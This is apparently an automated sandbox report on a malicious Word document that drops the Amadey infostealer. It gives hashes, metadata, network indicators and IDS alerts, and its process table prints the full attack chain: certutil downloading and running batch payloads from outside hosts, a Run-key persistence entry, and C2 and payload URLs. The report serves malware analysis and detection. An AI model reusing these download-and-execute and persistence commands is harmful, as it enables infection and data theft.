File name: | 33eeaf2f78e05a4911cf57c7ec52edf1ee48c308b58ce2ba46b0a3ee905bdfc7.doc |
Full analysis: | https://app.any.run/tasks/7df6e1fa-fb97-45d1-8ac4-c64ba2441ffc |
Verdict: | Malicious activity |
Threats: | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. |
Analysis date: | May 15, 2019, 07:07:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 949, Author: User, Template: Normal.dotm, Last Saved By: BlueSky, Revision Number: 35, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00:00, Create Time/Date: Fri Apr 26 10:38:00 2019, Last Saved Time/Date: Mon May 13 06:25:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | C0C007CE1A2D9FB8420C421D419F9F87 |
SHA1: | 186BAABDA13AD1A97D58C563C7671301ADD1A4DB |
SHA256: | 33EEAF2F78E05A4911CF57C7EC52EDF1EE48C308B58CE2BA46B0A3EE905BDFC7 |
SSDEEP: | 6144:Twlh7UWFVWld6gAHSiJa8dqgSKCFsBTxKkV8QcQZtRGj1tfW:shAWF+S1YQqNxsBTxz8QcQZtRGj18 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 ???? |
---|---|
CompObjUserTypeLen: | 28 |
HeadingPairs: |
|
TitleOfParts: | |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Korean (Unified Hangul Code) |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:05:13 05:25:00 |
CreateDate: | 2019:04:26 09:38:00 |
TotalEditTime: | 1.0 hours |
Software: | Microsoft Office Word |
RevisionNumber: | 35 |
LastModifiedBy: | BlueSky |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | User |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2956 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\33eeaf2f78e05a4911cf57c7ec52edf1ee48c308b58ce2ba46b0a3ee905bdfc7.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
1012 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1928 | C:\Windows\system32\cmd.exe /q /c copy /Y %windir%\System32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% && ct -urlcache -split -f http://tgbabcrfv.1apps.com/1.txt && cd /d %TEMP% && ren 1.txt 1.bat && del /f /q 1.txt && 1.bat | C:\Windows\system32\cmd.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3416 | ct -urlcache -split -f http://tgbabcrfv.1apps.com/1.txt | C:\Users\admin\AppData\Local\Temp\ct.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1520 | ct -urlcache -split -f "http://tgbabcrfv.1apps.com/3.txt" | C:\Users\admin\AppData\Local\Temp\ct.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3432 | ct -decode -f 3.txt setup.cab | C:\Users\admin\AppData\Local\Temp\ct.exe | — | cmd.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2528 | expand setup.cab -F:* C:\Users\admin\AppData\Local\Temp | C:\Windows\system32\expand.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: LZ Expansion Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
292 | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchost /t REG_SZ /d "C:\Users\Public\Documents\victory.exe" /f | C:\Windows\system32\reg.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
276 | C:\Users\Public\Documents\victory.exe | C:\Users\Public\Documents\victory.exe | — | cmd.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3488 | "C:\Users\Public\Documents\victory.exe" | C:\Users\Public\Documents\victory.exe | victory.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREAE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFF0883F184C036141.TMP | — | |
MD5:— | SHA256:— | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF72F868FD57AAD6D8.TMP | — | |
MD5:— | SHA256:— | |||
1012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR18A1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF276C9F9872BC3FE6.TMP | — | |
MD5:— | SHA256:— | |||
1012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF0D7D2752D69C98E1.TMP | — | |
MD5:— | SHA256:— | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF712B8186E3F76B9D.TMP | — | |
MD5:— | SHA256:— | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{668387D4-429F-4467-8365-EDE674F7C444}.tmp | — | |
MD5:— | SHA256:— | |||
2956 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AD1AC12E-DFF7-42F4-8BF2-8C7704B8371E}.tmp | — | |
MD5:— | SHA256:— | |||
1520 | ct.exe | C:\Users\admin\AppData\Local\Temp\3.txt | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3416 | ct.exe | GET | 200 | 88.99.13.69:80 | http://tgbabcrfv.1apps.com/1.txt | DE | text | 340 b | malicious |
3416 | ct.exe | GET | 200 | 88.99.13.69:80 | http://tgbabcrfv.1apps.com/1.txt | DE | text | 340 b | malicious |
1520 | ct.exe | GET | 200 | 88.99.13.69:80 | http://tgbabcrfv.1apps.com/3.txt | DE | text | 1.08 Mb | malicious |
1520 | ct.exe | GET | 200 | 88.99.13.69:80 | http://tgbabcrfv.1apps.com/3.txt | DE | text | 1.08 Mb | malicious |
3488 | victory.exe | POST | 200 | 104.243.41.186:80 | http://charley-online.com/back/2019/index.php | US | — | — | malicious |
3488 | victory.exe | GET | 200 | 188.241.39.220:80 | http://fighiting1013.org/2/sp.exe | GB | executable | 848 Kb | malicious |
2956 | WINWORD.EXE | GET | 200 | 188.241.39.220:80 | http://fighiting1013.org/2/modif8.doc | GB | document | 51.5 Kb | malicious |
3488 | victory.exe | POST | 200 | 104.243.41.186:80 | http://charley-online.com/back/2019/index.php | US | text | 50 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1520 | ct.exe | 88.99.13.69:80 | tgbabcrfv.1apps.com | Hetzner Online GmbH | DE | malicious |
3488 | victory.exe | 104.243.41.186:80 | charley-online.com | Choopa, LLC | US | suspicious |
3488 | victory.exe | 188.241.39.220:80 | fighiting1013.org | Hydra Communications Ltd | GB | malicious |
3416 | ct.exe | 88.99.13.69:80 | tgbabcrfv.1apps.com | Hetzner Online GmbH | DE | malicious |
2956 | WINWORD.EXE | 188.241.39.220:80 | fighiting1013.org | Hydra Communications Ltd | GB | malicious |
Domain | IP | Reputation |
---|---|---|
fighiting1013.org |
| malicious |
tgbabcrfv.1apps.com |
| malicious |
charley-online.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2956 | WINWORD.EXE | Misc activity | SUSPICIOUS [PTsecurity] Download DOC file with VBAScript |
2956 | WINWORD.EXE | Potentially Bad Traffic | ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) |
3416 | ct.exe | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |
1520 | ct.exe | Misc activity | ET INFO Certificate with Unknown Content M1 |
1520 | ct.exe | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |
1520 | ct.exe | Misc activity | ET INFO Certificate with Unknown Content M1 |
3488 | victory.exe | A Network Trojan was detected | MALWARE [PTsecurity] Trojan.Win32.Amadey |
3488 | victory.exe | A Network Trojan was detected | MALWARE [PTsecurity] Trojan.Win32.Amadey |
3488 | victory.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
3488 | victory.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |